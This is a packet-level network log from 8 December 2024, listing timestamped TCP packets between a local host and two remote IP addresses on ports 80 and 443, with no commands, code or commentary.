Dec 8, 2024 13:31:55.982708931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982712984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982718945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982724905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982734919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982768059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.982785940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983398914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983412027 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983422041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983432055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983445883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983453989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983465910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983479977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983489990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983500957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983513117 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983519077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983531952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983540058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983551025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983562946 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983571053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983581066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983589888 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983599901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.983608007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.983639002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.984258890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984272003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984282017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984292030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984302998 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984317064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.984325886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984337091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984349966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984355927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.984381914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.984405041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.984736919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984749079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.984791040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.984801054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.985017061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.985028982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.985060930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.985910892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.985965014 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.986449003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.986505985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.986761093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.986807108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.987323046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.987373114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.987695932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.987739086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.988188028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.988241911 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.988504887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.988517046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.988557100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.989434958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.989485979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.989551067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.989598036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.990134954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.990221977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.990562916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.990613937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.990993023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.991050005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.991115093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.991178989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.991909981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.991970062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.992667913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.992681980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.992732048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.992757082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.992796898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.993552923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.993603945 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.994182110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.994232893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.994393110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.994405985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.994453907 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.994466066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.995260000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.995311022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.995831013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.995881081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.996076107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.996088028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.996138096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.997034073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.997046947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.997109890 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.997128010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.998023987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.998035908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.998080015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.998811960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.998821974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.998858929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.998882055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.999547958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.999560118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.999607086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.999618053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.000394106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.000484943 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.000504017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.000551939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.105520010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.105573893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.105829954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.105945110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.105957031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.105964899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.105986118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.106008053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.106772900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.106818914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.106997967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.107098103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.107645988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.107656956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.107702017 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.107713938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.108453989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.108498096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.108731985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.108784914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.109278917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.109416008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.109456062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.110179901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.110244989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.110269070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.110316992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.111015081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.111087084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.111154079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.111212969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.111856937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.111923933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.111975908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.112713099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.112781048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.112880945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.112924099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.113537073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.113548040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.113588095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.114392042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.114434958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.114749908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.114811897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.115293980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.115303993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.115348101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.116146088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.116194010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.116472960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.116554022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.116980076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.117036104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.117304087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.117381096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.117825031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.117872953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.118046045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.118161917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.118769884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.118824005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.118844032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.118881941 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.119549036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.119599104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.119771957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.119842052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.120596886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.120647907 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.120754004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.120825052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.121254921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.121267080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.121305943 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.165184021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.165345907 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.165597916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.165611029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.165638924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.165657043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.165699959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.165749073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.166431904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.166505098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.166703939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.166752100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.167272091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.167344093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.167709112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.167767048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.168085098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.168164015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.168880939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.168956995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.169045925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.169056892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.169094086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.170105934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.170116901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.170165062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.171070099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.171118021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.171279907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.171323061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.171740055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.171785116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.171829939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.171873093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.172497034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.172509909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.172540903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.172558069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.173258066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.173304081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.173382044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.173429012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.174201012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.174213886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.174245119 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.174263000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.174926996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.174974918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.175107956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.175168037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.175827980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.175879002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.176678896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.176692009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.176702976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.176743984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.176779985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.177464008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.177644968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.178345919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.178358078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.178369999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.178399086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.178432941 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.179192066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.179970026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.180037022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.180047035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.180079937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.180090904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.180099010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.180850029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.180896044 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.181571960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.181619883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.181689978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.181732893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.182178974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.182224035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.182790041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.182800055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.182842016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.183690071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.183959961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.184142113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.184184074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.184566975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.184576988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.184614897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.185153008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.185204029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.185363054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.185412884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.186032057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.186042070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.186089993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.186837912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.186996937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.187252998 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.187304020 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.187649012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.187711000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.188003063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.188071012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.188487053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.188539982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.188711882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.188780069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.189353943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.189418077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.189990997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.190049887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.190362930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.190470934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.190795898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.190846920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.191016912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.191066980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.279134989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.294984102 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.297899008 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.297976971 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.298059940 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.298079014 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.298089027 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.298094988 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.301074982 CET	49862	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.301117897 CET	443	49862	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.301317930 CET	49862	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.301465988 CET	49862	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.301477909 CET	443	49862	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.398497105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.700619936 CET	443	49858	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.701072931 CET	49858	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.701107979 CET	443	49858	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.701505899 CET	49858	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.701523066 CET	443	49858	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.725368023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.725423098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.725752115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.725761890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.725800037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.725811958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.725819111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.725845098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.726583004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.726641893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.726908922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.727144003 CET	49835	80	192.168.2.6	185.215.113.206
